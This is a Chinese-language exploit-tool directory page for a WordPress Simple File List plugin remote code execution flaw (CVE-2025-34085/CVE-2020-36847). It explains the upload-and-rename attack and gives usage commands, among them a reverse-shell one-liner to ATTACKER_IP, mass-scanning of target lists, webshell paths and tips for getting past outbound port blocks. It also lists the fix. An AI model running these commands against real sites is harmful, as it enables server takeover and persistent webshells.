Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-34085 — CVE-2025-34085 漏洞利用 | Kitploit
工具/GitHubGitHub/0xgunrunner/cve-2025-34085
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHub0xgunrunner/cve-2025-34085

CVE-2025-34085

CVE-2025-34085 漏洞利用

查看仓库
16个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-34085 — WordPress Simple File List 未认证远程代码执行漏洞

针对 CVE-2025-34085(与 CVE-2020-36847 重复)的自动化利用工具,该漏洞是 WordPress Simple File List 插件版本 ≤ 4.2.2 中的一个关键未认证远程代码执行漏洞。

注意: CVE-2025-34085 被 MITRE 驳回,认为是 CVE-2020-36847 的重复。该漏洞确实存在,并在 4.2.3 版本中得到修复。两个 CVE ID 指向同一底层问题。

漏洞概要

字段详情
CVECVE-2025-34085 / CVE-2020-36847
插件Simple File List
受影响版本≤ 4.2.2
修复版本4.2.3
类型无限制文件上传 → 重命名绕过 → 远程代码执行
CVSS9.8(严重)
认证无需认证
原始发现者coiffeur
Metasploit 模块exploit/multi/http/wp_simple_file_list_rce

攻击原理

  1. 上传 — 通过插件的上传接口(ee-upload-engine.php)将一个伪装成 .png 文件的 PHP 载荷上传。上传引擎验证文件扩展名,但接受图片文件。

  2. 重命名 — 插件的重命名功能(ee-file-engine.php)没有强制扩展名限制。攻击者将 .png 重命名为 .php(或 .phtml、.php5、.php3)。

  3. 执行 — 重命名后的 PHP 文件现在在上传目录 /wp-content/uploads/simple-file-list/ 中可访问并可执行,从而允许攻击者执行任意命令。

环境要求

root@kitploit:~
pip install requests colorama

Python 3.6+

使用方法

单个目标

root@kitploit:~
python3 CVE-2025-34085.py -u http://target.com --cmd "id"

单个目标带内联命令(不使用 ?cmd= 参数)

root@kitploit:~
python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline

批量扫描

创建一个 targets.txt 文件,每行一个 URL:

root@kitploit:~
http://target1.com
http://target2.com
https://target3.com
root@kitploit:~
python3 CVE-2025-34085.py --cmd "id"

参数说明

提示: 当你需要反弹 Shell 或者目标存在查询字符串过滤时,请使用 --inline。如果不使用 --inline,利用工具会释放一个接受 ?cmd= 参数的 webshell。

输出

成功利用的记录会写入 vuln.txt:

root@kitploit:~
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)

针对 OSCP 的行动安全说明

  • 该利用工具会向磁盘写入 PHP 文件——这会留下痕迹
  • webshell 会持久存在于 /wp-content/uploads/simple-file-list/<随机>.php
  • 成功上传的记录会保存在本地的 vuln.txt 中——对你的报告很有用
  • 在考试环境中,请使用 --inline 配合反弹 Shell,避免留下带有 ?cmd= 的持久 webshell
  • 如果目标屏蔽了出站端口,可以尝试常见允许端口(80、443、53)

参考链接

  • NVD — CVE-2025-34085
  • NVD — CVE-2020-36847
  • Wordfence Advisory
  • Metasploit Module
  • Plugin Changelog (Patch)
  • Exploit-DB #48979
  • Original PoC by coiffeur — Exploit-DB #48349

修复建议

将 Simple File List 插件升级到 4.2.3 或更高版本。

免责声明

本工具仅供 授权的渗透测试和教育目的 使用。未经授权访问计算机系统是违法行为。请务必在获得适当授权后再进行测试。

致谢

  • 原始漏洞发现: coiffeur
  • 原始利用脚本: 0xgh057r3c0n, B1ack4sh (Ashwesker)
  • 维护者: 0xgunrunner
下载工具
参数描述默认值
-u, --url单个目标 URL—
--cmd在目标上执行的命令id
--inline将命令直接注入 PHP shell(硬编码,无 ?cmd= webshell)False